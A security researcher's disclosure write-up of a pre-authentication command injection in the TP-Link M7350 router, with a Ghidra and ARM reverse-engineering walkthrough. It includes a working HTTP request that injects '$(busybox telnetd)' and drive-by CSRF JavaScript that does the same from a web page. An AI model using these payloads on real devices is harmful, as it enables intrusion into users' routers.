CVE-2019-12103 – Analysis of a Pre-Auth RCE on the TP-Link M7350, with Ghidra!

TL;DR

The TP-Link M7350 (V3) is affected by a pre-authentication command injection vulnerability (CVE-2019-12103) and a few post-authentication ones (CVE-2019-12104). These injections can be exploited remotely if the attacker is on the same LAN or otherwise able to reach the router web interface. CVE-2019-12103 can also be exploited from any browser via cross-site request forgery (CSRF), since there’s no CSRF protection before the user logs in.

If you’re running one of these devices, update now to the new firmware (version 190531).

Also, TP-Link are a massive chore to get in contact with. It took three tries at their vulnerability reporting contact form to get a response.

Anyway, this post is technical – about finding issues like this using Ghidra. Because reverse-engineering to find command injection bugs is fun!

Most routers are pretty bad at security

Most consumer-grade networking hardware comes with an embedded webserver. Web servers are a really easy way for users to access configuration on the device, with a GUI, without having to install proprietary software. A lot of the time, the webserver exposes some kind of API endpoint – sometimes JSON or XML. This webserver API, more often than not, is just a thin wrapper around shell commands which alter system-level functionality. The variables passed to the webserver API are just being handed to a shell command. Because most consumer-grade networking hardware is just running Linux.

When developers haven’t been very, very careful – you’ll find some kind of arbitrary command execution potential. I’ve very rarely seen routers which don’t have command injection or memory management problems *somewhere* on an exposed interface.

So, here’s the story of finding one quite convenient command injection in the TP-Link M7350.

The M7350. What’s it running?

As “Lightning” as they claim it to be, the M7350 is just another Qualcomm-based cellular hotspot – in this case it’s running off a (relatively ancient at this point) MDM9225. It’s boxy, quite nice to look at, feels quite solid, and works as well as any other cheapish cellular hotspot. So, it’s fine. Generic.

From our perspective, we want to see what the thing is running, so we can try to find bugs. Luckily, the firmware can be found on the TP-Link website.

I’m running an M7350 with the hardware version 3.0, so my firmware file was called M7350(EU)_V3_160330_1472438334613t.zip. This file itself is just a ZIP, which contains PDF install instructions and, err, another ZIP called M7350(EU) 3.0_1.1.1 Build 160330 Rel.1002n_User.zip.zip. Inside THAT ZIP, we find this:

This looks very much like a zero-attempt-at-obfuscation-or-encryption firmware update file. For some flavour of Android. Which is good for us, because we can just pull binaries that look interesting out and start analysing them. We can even see the firmware update script, at META-INF/com/google/android/updater-script.

We’ve already written about attacking devices by using Android update packages here. But that’s a bit outside of the scope of this particular hunt – we want bugs in the web interface!

So, first, how can we figure out which binaries are interesting to us?

grep, baby

We can figure out some key variables we might have control over, and grep for them. Probably 90% of my Windows Subsystem for Linux use is grep. I hate findstr. grep is amazing.

Anyway, from some generic use of the M7350 webserver through Burp, we can see some variable names, which might help us find the binaries which process them.

Generic configuration requests are sent to the /cgi-bin/qcmap_web_cgi endpoint. The POST body is JSON-encoded. Post-authentication requests require a “token” value. The “module” parameter is interesting, because it suggests that there will be a big switch case running somewhere, which handles input data differently based on which module is being requested.

So, let’s grep for “webServer” and see where it turns up.

$ grep -ro webServer

Binary file data/bin/QCMAP_Web_CLIENT matches
system/WEBSERVER/www/browserWarning.html:webServer
Binary file system/WEBSERVER/www/cgi-bin/qcmap_web_cgi matches
system/WEBSERVER/www/login.min.js:webServer
system/WEBSERVER/www/settings.min.js:webServer
system/WEBSERVER/www/settings.min.js:webServer
system/WEBSERVER/www/tpweb.min.js:webServer
system/WEBSERVER/www/tpwebPhone.min.js:webServer
system/WEBSERVER/www/tpwebPhone.min.js:webServer
system/WEBSERVER/www/tpwebPhone.min.js:webServer
system/WEBSERVER/www/tpwebPhone.min.js:webServer

To avoid extraneous garbage output, especially on the long, linebreak-free JavaScript files, I passed the -o flag. This only shows the string we actually grepped for if it’s found in a text file. We’re only interested in binary files anyway. The -r tells grep to grep recursively, from the current working directory onwards. grep grep grep. I love to grep.

“webServer” appears in the QCMAP_Web_CLIENT and qcmap_web_cgi binaries. Let’s have a look at the qcmap_web_cgi binary first. If you remember from the POST request above, qcmap_web_cgi is the endpoint everything is being POSTed to. So it’ll likely be in charge of managing how each request is handled.

Ghidra is quite good for this

Why not learn basic Ghidra while we’re at it? Once we’ve opened up the qcmap_web_cgi binary and run the generic analysis, we can start off by searching for strings (by clicking Search -> For Strings).

After clicking through the search dialog, leaving the default settings, we can start to see lots of strings – including our “webServer” string.

Double-clicking that entry takes us to where “webServer” is located in memory. Ghidra helpfully notes that this address is cross-referenced elsewhere in the binary (with the XREF note).

We can double-click that cross-reference and it’ll take us to the function that “webServer” is referenced in. I’ve renamed it already here – but it’d usually be called something generic like FUN_00008ce0. I imagine FUN stands for “function” rather than just “fun”. Although reverse-engineering is “fun”, most of the time I wouldn’t call it “FUN”.

Ghidra’s decompiler is quite good (we’ll get to that later), so we can really easily see what the logic of this function is.

A string is passed to the function, it returns 1 if the string is “webServer”. Easy.

Then, we can follow this function backwards, to figure out how it gets called and why. Right-click the function name in the disassembly view (doesn’t work in the decompiler view for, I imagine, sensible reasons I don’t understand). Then click through References -> Show Call Trees.

This will give a really simple expandable bullet-point list of where the function’s getting called from – and what it’s calling.

On the left, you can see the incoming references – webServer_or_status is being called by FUN_00008d78, which is itself called by main (and, before that, the ELF entry). On the right, the outgoing calls show webServer_or_status is only calling strcmp.

We can then start poking around functions, focussing only on those which might do something interesting with the input we give them.

Quick spoiler – FUN_00008d78 is really boring for our purposes. It’s mainly there to pull data out of the environment variables, pull stuff out of the JSON and perform authentication checks where appropriate.

So, let’s have a look at the main function.

So, this is the part of main that calls FUN_00008d78 – one level up from webServer_or_status. All the other if/else chunks are error handling – there to throw errors if the request is badly-formed or incomplete. This highlighted chunk of code does all the heavy lifting for valid requests.

You’ll notice that FUN_00008d78 doesn’t return anything. And then FUN_000092ec gets called.

Let the FUN begin

FUN_000092ec is actually quite interesting. Even from the call tree, you can see it calls other functions which open sockets and make sendto and recv calls. There’s also at least one call to system.

You might expect something like this from a webserver-adjacent binary – but remember that the HTTP server socket activity isn’t being handled by this binary at all. This binary isn’t the webserver itself – it’s just an endpoint that the actual webserver will pass the HTTP request to. Any socket activity is doing something else entirely. Something which makes our RE journey a bit longer, but perhaps interesting.

Ok, back to the binary. As you can see in the call tree, FUN_000092ec is calling FUN_00008f3c, which is making socket, system and sendto calls! Let’s look at that (with a little bit of manual variable name clean-up):

The binary is bind’ing to the socket file /www/qcmap_cgi_webclient_file. Then it’s sendto’ing request data to the socket file /www/qcmap_webclient_cgi_file.

All this means for us is that we now have to expand our search a bit. Since data is being pushed out of the qcmap_web_cgi binary, we need to figure out where it’s going, and what’s happening to it.

I didn’t choose grep. grep chose me

Let’s grep for the qcmap_webclient_cgi_file file. Another process will likely be listening on this socket file. God I love grep.

$ grep -r qcmap_webclient_cgi_file
Binary file data/bin/QCMAP_Web_CLIENT matches
Binary file system/WEBSERVER/www/cgi-bin/qcmap_web_cgi matches

Only 2 results. Our already-boring qcmap_web_cgi binary, and the now very interesting QCMAP_Web_CLIENT binary. You might remember that from our earlier “webServer” grep.

Once we’ve got it loaded up into Ghidra, we can check for strings again. This time, “webServer” shows up a couple times.

But, this time, clicking through to its address only shows “webServer” floating in a sea of nulls.

No direct cross-references, nothing immediately useful. So, what can we do?

Scroll a bit further down, however, and there’s a few non-null bytes. You can convert these to a dword by right-clicking the first one -> Data -> dword.

This looks very much like a lookup table. If you double-click on the dword 15384h, you’ll find yourself at that offset within the binary. It looks very much like the start of a function. A function which, just by eyeballing, looks like it parses requests to the “webServer” API module.

Can you spot the vulnerability yet? We’ll come back to that in a sec.

You can rename this function by right clicking on FUN_00015384 -> Rename Function. I chose the name API_webServer_function.

If, like me, you want to make sure that that pointer to 0x00015384 in the lookup table actually shows your new function name, you can go back to the pointer, right click it -> References -> Create Memory Reference. To make life easier, once you know the structure of the lookup table, you can just press the “p” key when you’re clicked on the first byte of the dword to convert it to a pointer to a function immediately.

The disassembly view will then show you the function name, rather than just the raw dword. Which is a bit nicer.

If we wanted to be thorough, we could scroll up to what looks like the start of the lookup table, see if it’s referenced in a function, and see what that function does.

Scrolling up to what looks like the start of the lookup table is the string “lan”. This is referenced by a function I’ve renamed “parse_json”.

The parse_json function is pretty big, but the point it references the “lan” string shows how it’s using this lookup table.

This do/while loop grabs the module name from the request JSON (every single loop iteration, for some reason), and – starting from the address of “lan” – cycles through each relative offset in increments of 0x44. Each loop, it strcmp‘s the user-supplied string passed to the “module” parameter with the string at the start of each entry in the lookup table until it matches. Then it calls the related function. I doubt this looks anything like the lookup function the developers actually wrote – but this is how it looks in the decompiled pseudocode.
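The table walk described above can be modelled in a few lines of JavaScript. This is a minimal sketch, not the firmware's code: the 0x44 stride, the "lan" and "webServer" names and the 0x15384 pointer come from the analysis, but the split of each entry into a 0x40-byte name followed by a 4-byte little-endian pointer is my assumption, and the address given for "lan" is made up.

```javascript
// Model of the module lookup table.
// ASSUMPTION: each 0x44-byte entry is a 0x40-byte NUL-padded name
// followed by a 4-byte little-endian function pointer.
const ENTRY_SIZE = 0x44;
const NAME_SIZE = 0x40; // assumed layout, not confirmed by the binary

// Build a zero-filled table from [name, handlerAddress] pairs.
function buildTable(entries) {
  const table = Buffer.alloc(entries.length * ENTRY_SIZE);
  entries.forEach(([name, handlerAddress], index) => {
    const base = index * ENTRY_SIZE;
    table.write(name, base, NAME_SIZE - 1, "ascii");
    table.writeUInt32LE(handlerAddress, base + NAME_SIZE);
  });
  return table;
}

// Read a NUL-terminated ASCII string of at most maxLength bytes.
function readCString(buffer, offset, maxLength) {
  const end = buffer.indexOf(0, offset);
  const limit = offset + maxLength;
  const stop = end === -1 || end > limit ? limit : end;
  return buffer.toString("ascii", offset, stop);
}

// Walk the table in 0x44 strides, comparing names like strcmp would.
function lookupHandler(table, moduleName) {
  for (let offset = 0; offset + ENTRY_SIZE <= table.length; offset += ENTRY_SIZE) {
    if (readCString(table, offset, NAME_SIZE) === moduleName) {
      return table.readUInt32LE(offset + NAME_SIZE);
    }
  }
  return null; // no matching module
}

const table = buildTable([
  ["lan", 0x00010000],       // hypothetical address, for illustration only
  ["webServer", 0x00015384], // the address seen in the lookup table
]);

console.log(lookupHandler(table, "webServer").toString(16)); // 15384
```

An unknown module name simply falls off the end of the table and returns null here; what the real binary does in that case isn't something I checked.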

Oh yeah, back to the bug hunting

Bit of a generic RE distraction there. Anyway, back in the API_webServer_function, the Ghidra decompiler has prepared a really nice switch statement for us to peruse.

The user-supplied “action” value from the JSON request is extracted (from iVar1 + 0x14), and the switch runs based on what its value is.

So, if we sent a request containing something like {"module":"webServer","action":0}, the QCMAP_Web_CLIENT process would call the function call_popen, with the argument “uci get webserver.user_config.language”. Then it creates a JSON object, and returns the value it got from call_popen as the “language” value.

call_popen is a name I gave the function myself. It’s just a thin wrapper around the popen library call, with a bit of error checking and return value handling. Here it is in full:

The popen call itself is highlighted.

Grand popening, grand closing

popen literally runs system-level commands: it hands its argument to the shell (/bin/sh -c) and gives you a pipe to the result. It’s much like system, or exec*. It’s not ideal to pass untrusted user input straight to it. But that’s exactly what this binary does.

If the action is 1, then the value of the “language” parameter is passed to a shell command string constructed by that snprintf function, which is then passed to call_popen.

“BUT DAVE” – I hear you all say in unison – “WHERE’S THOSE ADDITIONAL ARGUMENTS TO SNPRINTF?”

That’s really astute and observant of you. Clever you. Well, the answer is, the decompiler isn’t perfect. We’d expect to see:

snprintf(char_array_204, 200, "uci set webserver.user_config.language=%s;uci commit webserver", *(iVar1 + 0x10));

But we don’t. But we DO know that it SHOULD say that. Here’s how we know.

Function calls in ARM

Function calls in ARM are similar to x86_64, in that arguments are passed in registers. R0 holds the first argument, R1 the second, R2 the third and R3 the fourth. Anything beyond that goes on the stack.

We’re looking at a snprintf call, which should take at least four arguments if the format string contains a conversion specifier to fill. And that %s in the “uci set…” command string is definitely a conversion specifier.

snprintf should be called in the following format:

int snprintf(char *s, size_t n, const char *format, ...);

The trailing ... stands for the variadic arguments: one for each conversion specifier in the third argument, the “format” char array. Seeing as we have a definite %s in there, we would expect R0, R1, R2 AND R3 to contain the arguments for this function call.
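To make the register bookkeeping concrete, here is a small JavaScript model of how the first four word-sized arguments land in R0 to R3. It is a deliberately simplified sketch of the ARM calling convention (no 64-bit or floating-point arguments), and the argument labels are placeholders of my own rather than values from the binary.

```javascript
// Simplified model of ARM argument passing: the first four word-sized
// arguments go in R0-R3, anything after that is passed on the stack.
const ARG_REGISTERS = ["R0", "R1", "R2", "R3"];

function assignArguments(args) {
  const registers = {};
  const stack = [];
  args.forEach((arg, index) => {
    if (index < ARG_REGISTERS.length) {
      registers[ARG_REGISTERS[index]] = arg;
    } else {
      stack.push(arg);
    }
  });
  return { registers, stack };
}

// snprintf(buffer, 200, format, language): placeholder labels, not real addresses.
const call = assignArguments(["&buffer", 200, "&format", "&language_string"]);

console.log(call.registers.R3); // &language_string
```

With only three arguments, R3 would be left out of the model entirely, which is effectively what the decompiler output claims is happening.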

In fact, we can SEE, WITH OUR OWN EYES, IN THE DISASSEMBLY, that R3 – the register we’d expect to have a pointer to the user-controlled “language” parameter value – is being set. Let’s follow how that happens.

First the return value from cJSON_GetObjectItem is moved to R6 (the return value is stored in R0, but is noted as “language_val” here because I renamed it in the decompiler view).

Yes, I know that’s a SUBtract instruction, but sometimes in ARM disassembly you’ll see varieties of ADD or SUB with zero values instead of a MOV. SUBS R6, R0, #0x0 subtracts nothing from R0 before putting it into R6. It’s essentially just a MOV. With a KEY DIFFERENCE.

The fact that it’s a “SUBS” rather than just a “SUB” means that the condition flags are updated depending on the result of the operation. Therefore, if the SUBS instruction results in R6 being equal to zero, then the zero flag (Z) will be set to 1, and the next BEQ branch will be taken.
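If the flag behaviour feels abstract, a toy model helps. The sketch below only tracks the Z and N flags for a 32-bit SUBS (the carry and overflow flags are left out on purpose), and the function names are my own.

```javascript
// Toy model of SUBS Rd, Rn, #imm for 32-bit registers.
// Only the Z (zero) and N (negative) flags are modelled here.
function subs(rn, operand2) {
  const result = (rn - operand2) >>> 0; // wrap to an unsigned 32-bit value
  return {
    result,
    Z: result === 0,
    N: (result & 0x80000000) !== 0,
  };
}

// BEQ is taken when the Z flag is set.
function beqTaken(flags) {
  return flags.Z;
}

// SUBS R6, R0, #0x0 with a NULL return value in R0: branch taken.
console.log(beqTaken(subs(0x00000000, 0))); // true

// The same instruction with a non-NULL pointer: R6 gets the pointer, no branch.
console.log(beqTaken(subs(0x00015384, 0))); // false
```

So the single instruction both copies the pointer into R6 and performs the NULL check that the following BEQ acts on.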

So there’s a lot going on in just a couple of instructions.

We can see that in the pseudocode as well:

iVar1 != 0 checks for a null return value.

Back to the assembly. The pointer to the object returned from the cJSON_GetObjectItem call has been moved to R6. Then, the value at the memory referenced by the pointer + 0x10 is moved to R3. Then a CMP instruction checks if it’s null.

We can make an educated guess, by reading other parts of the pseudocode, that the offset 0x10 of the object returned from cJSON_GetObjectItem contains a pointer to the user-supplied string value. Then there’s a quick CMP to make sure the pointer isn’t null. Again, we can see that reflected in the pseudocode:

But, for some reason, the Ghidra decompiler doesn’t take into account the fact that R3 is still populated, even after the CMP, and doesn’t include it in the pseudocode. Oh well. At least we know for sure it’s there now.

That bug, yes, sorry, back to that

It should be self-evident by now – but setting the “language” to a shell command will result in our shell command being literally included in the “uci set…” string by snprintf. And when that string is passed to popen, that command will be executed.

We know now that the pseudocode should really read something like this:

So the value we supply to the “language” parameter replaces the %s format specifier in the “uci set…” string. The resulting command string gets stored at acStack224. Then popen gets called on it.
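Here is a rough JavaScript stand-in for that snprintf call, just to show what string ends up being handed to popen. The format string and the 200-byte limit are taken from the call above; the helper name is mine, it only understands a single %s, and it assumes ASCII input so that characters and bytes line up. Nothing is executed.

```javascript
// Format string and buffer size as seen in the snprintf call.
const FORMAT = "uci set webserver.user_config.language=%s;uci commit webserver";
const BUFFER_SIZE = 200;

// Minimal stand-in for snprintf(buf, 200, FORMAT, language).
// A replacer function is used so "$" in the value is never treated specially.
function formatCommand(language) {
  const full = FORMAT.replace("%s", () => language);
  return full.slice(0, BUFFER_SIZE - 1); // snprintf keeps at most n-1 characters plus the NUL
}

console.log(formatCommand("en"));
// uci set webserver.user_config.language=en;uci commit webserver

console.log(formatCommand("$(busybox telnetd)"));
// uci set webserver.user_config.language=$(busybox telnetd);uci commit webserver
```

The second string is a perfectly valid shell command line: the shell evaluates the $(...) substitution before uci ever sees its argument.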

So, the following request will spawn telnetd. Pre-authentication.

POST /cgi-bin/qcmap_web_cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.1/settings.html
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 65
Connection: close

{"module":"webServer","action":1,"language":"$(busybox telnetd)"}

Ta-daa. We can then go on to log into the device and plunder it.
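If you’re rebuilding that request by hand, the Content-Length has to match the body exactly. A quick sketch for checking it, assuming Node.js (for Buffer) and using a helper name of my own:

```javascript
// Build the JSON body for a "set language" request (action 1).
function buildSetLanguageBody(language) {
  return JSON.stringify({ module: "webServer", action: 1, language: language });
}

const body = buildSetLanguageBody("$(busybox telnetd)");

console.log(body);
// {"module":"webServer","action":1,"language":"$(busybox telnetd)"}

console.log(Buffer.byteLength(body, "utf8")); // 65
```

JSON.stringify emits no whitespace by default, which is why the result lines up with the Content-Length: 65 header in the request above.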

So what? Another LAN-only RCE?

Well, not entirely. Cellular modems connect to APNs. APNs are like massive LANs, provided by a telecoms company. APNs can be configured badly – for instance by not implementing client segregation. In those cases, anyone *quite* naughty connected to the same APN as you might be able to access the web configuration interface of your cellular modem. Anyone *extremely* naughty with access to the telco GGSN would also likely be able to attach to the web interface of the router – assuming the router doesn’t block access over the cellular interface.

There’s also the possibility of drive-by JavaScript cross-site request forgery attacks. It’s really easy, in JavaScript, to enumerate where the router is, see if it’s potentially vulnerable, and forge requests to it which might execute code. You can see an example of this kind of attack in one of our older posts. So, a nasty page can execute arbitrary code on your router. You don’t have to do anything except visit an entirely unrelated, but malicious page.

Here’s the JavaScript which will inject a command, wait 500ms, and set the language back to normal:

// Resolve after the given number of milliseconds.
function sleep(ms) {
    return new Promise(resolve => setTimeout(resolve, ms));
}

// Send an unauthenticated "set language" request to the router.
function inject(lang) {
    var xhr = new XMLHttpRequest();
    var url = "http://192.168.0.1/cgi-bin/qcmap_web_cgi";
    xhr.open("POST", url, true);
    xhr.send(JSON.stringify({"module":"webServer","action":1,"language":lang}));
}

// Inject the command, then restore the language 500ms later.
inject("$(busybox telnetd)");
sleep(500).then(() => {
    inject("en");
});

The fix

TP-Link fixed this issue in firmware update 190531. What was the fix?

Single-quote escaping the format string. Clever.
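For reference, this is roughly what robust single-quoting of a shell argument looks like. It is a sketch of the standard POSIX shell technique written in JavaScript, not TP-Link's actual patch (I only have the decompiled binary, and the helper names here are mine). The important detail is that any single quote inside the value has to be escaped too, otherwise the value can close the quote and break out again.

```javascript
// Wrap a value in single quotes for a POSIX shell, escaping embedded
// single quotes as '\'' (close quote, escaped quote, reopen quote).
function shellSingleQuote(value) {
  return "'" + value.replace(/'/g, "'\\''") + "'";
}

// Hypothetical safer version of the "uci set" command construction.
function formatQuotedCommand(language) {
  return "uci set webserver.user_config.language=" +
    shellSingleQuote(language) + ";uci commit webserver";
}

console.log(formatQuotedCommand("$(busybox telnetd)"));
// uci set webserver.user_config.language='$(busybox telnetd)';uci commit webserver

console.log(shellSingleQuote("a'b"));
// 'a'\''b'
```

Inside single quotes the shell performs no substitution at all, so the $(...) is stored as a literal (and fairly silly) language value instead of being run. Not passing user input through a shell in the first place would be more robust still.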

Conclusions

Bugs in cellular modems are still really common. This was an example of only one of the bugs we found in the M7350. To be fair, I only spent a day or so on it, all told. So there may well be more, less obvious, issues. And there may well be more in other TP-Link devices. Happy hunting!

TP-Link’s Response

It took three attempts via TP-Link’s vulnerability reporting form for them to get back to me. Not good. Here’s the timeline:

26/02/2019 – First contact attempt.
02/03/2019 – Second contact attempt.
12/03/2019 – Third contact attempt.
18/03/2019 – TP-Link finally reply.
18/03/2019 – Sent details of one command injection issue.
02/04/2019 – TP-Link confirms receipt of email.
18/04/2019 – TP-Link confirms issue exists, states they’re working on a fix.
18/04/2019 – TP-Link provides beta firmware for testing.
25/04/2019 – I find time to look at this firmware, find another bug.
29/04/2019 – TP-Link provides another updated firmware which fixes this second bug.
14/04/2019 – I find a bit more time to look again at this firmware, confirm fix.
03/06/2019 – TP-Link release firmware version 190531

TP-Link have said that this issue only affects M7350 hardware version 3. I’m not entirely sure if this is true. I’m never convinced by companies which fix issues reactively, piecemeal, rather than proactively. I always hope that, on receipt of a command injection vulnerability report, they’ll give their entire codebase some kind of audit for other, extremely similar issues, but I guess TP-Link don’t.